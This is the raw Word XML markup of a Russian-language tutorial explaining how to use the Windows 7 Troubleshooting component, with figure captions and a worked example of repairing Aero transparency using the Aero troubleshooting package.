    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Щелкните Пуск - </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления - Крупные значки - Устранение неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откроется окно компонента </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок, рисунок 1. Е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">сли пользователь открыл это окно впервые, то будет предложено получить доступ к Windows Online Troubleshooting Service (WOTS) - это бесплатный онлайн сервис, позволяющий Windows 7 загружать новые или обновленные пакеты поиска неисправностей. Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Да</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, если хотите связаться с WOTS или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Нет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, если хотите пользоваться только встроенными средствами поиска неисправностей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1533183" cy="1231200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Рисунок 1" descr="Описание: Компонент Устранение неполадок в Windows 7">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омпонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId189"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1533278" cy="1231276"/>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 xml:space="preserve">Рисунок 1 - Окно компонента </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того, чтобы получать из интернета сведения или новые средства устранения неполадок внизу окна должен быть установлен флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Получить самые последние средства устранения неполадок через интернет-службу устранения неполадок Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме того проверьте параметры настройки компонента</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Устранения неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Для этого нажмите ссылку в левой части окна</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Настройка, рисунок 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="741680" cy="950595"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="4" name="Рисунок 4" descr="Описание: http://wininfo.org.ua/uploads/posts/2011-11/1320530507_up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wininfo.org.ua/uploads/posts/2011-11/1320530507_upr6.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="741680" cy="950595"/>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2 - Окно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Настройка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Убедитесь в том, что флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разрешить пользователям просматривать средства устранения неполадок, доступные через интернет - службы устранения неполадок Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> поставлен, рисунок 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1946550" cy="937736"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Рисунок 5" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId191"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1946224" cy="937579"/>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3 – Установка флажка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пакеты поиска неисправностей разбиты по категориям:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование и звук;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сеть и интернет;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оформление и персонализация;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="0083647E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Система и безопасность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для просмотра полного списка пакетов, нажмите ссылку в левой части окна </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотр всех категорий</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, рисунок 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="734695" cy="993775"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="6" name="Рисунок 6" descr="Описание: http://wininfo.org.ua/uploads/posts/2011-11/1320530416_up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wininfo.org.ua/uploads/posts/2011-11/1320530416_upr3.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="734695" cy="993775"/>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 xml:space="preserve">Рисунок 4 - Окно </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотр всех категорий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откроется окно, содержащее полный список пакетов устранения неполадок. При этом Windows подключается к сети и проверяет наличие новых пакетов устранения неполадок. Подведите указатель мыши к интересующему пакету и увидите параметры пакета, включающие и его описание, рисунок 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1993775" cy="517284"/>
            <wp:effectExtent l="19050" t="0" r="6475" b="0"/>
            <wp:docPr id="7" name="Рисунок 7" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId192"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1993511" cy="517215"/>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noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1996950" cy="1219262"/>
            <wp:effectExtent l="19050" t="0" r="3300" b="0"/>
            <wp:docPr id="8" name="Рисунок 8" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId193"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1996876" cy="1219217"/>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5 – Параметры пакета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При запуске какого-либо пакета устранения неполадок запустится мастер, который может задать несколько вопросов, например, предложит выбрать один из вариантов описания проблемы или выполнить проверку с правами администратора, рисунок 6, 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1946550" cy="1476882"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Рисунок 9" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId194"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1946307" cy="1476697"/>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6 - Вариант описания проблемы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1990600" cy="1577037"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Рисунок 10" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId195"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1990568" cy="1577012"/>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7 - Проверка с правами администратора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">По умолчанию, в случае найденных ошибок, мастер устранения неполадок применяет изменения автоматически. Если щелкнуть ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в первом окне мастера и снять флажок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Автоматически исправлять ошибки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, то при обнаружении неполадки будет предложен список возможных путей ее устранения, рисунок 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1954209" cy="1483200"/>
            <wp:effectExtent l="19050" t="0" r="7941" b="0"/>
            <wp:docPr id="11" name="Рисунок 11" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId196"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1954291" cy="1483262"/>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8 - Список возможных путей устранения неполадки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В любом случае по окончании диагностического теста выводится отчет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для демонстрации работы компонента Устранения неполадок вручную остановим службу </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер сеансов диспетчера окон рабочего стола</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В целом эффект AERO работает, но исчезла прозрачность окон. Для устранения этой неполадки воспользуемся пакетом устранения неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aero</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Щелчок по ссылке откроет первое окно мастера. Оставим все без изменений и нажмем кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее, рисунок 9</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1902083" cy="1432800"/>
            <wp:effectExtent l="19050" t="0" r="2917" b="0"/>
            <wp:docPr id="12" name="Рисунок 13" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId198"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1902377" cy="1433022"/>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 xml:space="preserve">Рисунок 9 - Пакет устранения неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер продолжит свою работу и начнет диагностику неполадок, рисунок 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1970518" cy="1490400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Рисунок 14" descr="Описание: Компонент Устранение неполадок в Windows 7">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Компонент Устранение неполадок в Windows 7">
                      <a:hlinkClick r:id="rId200"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
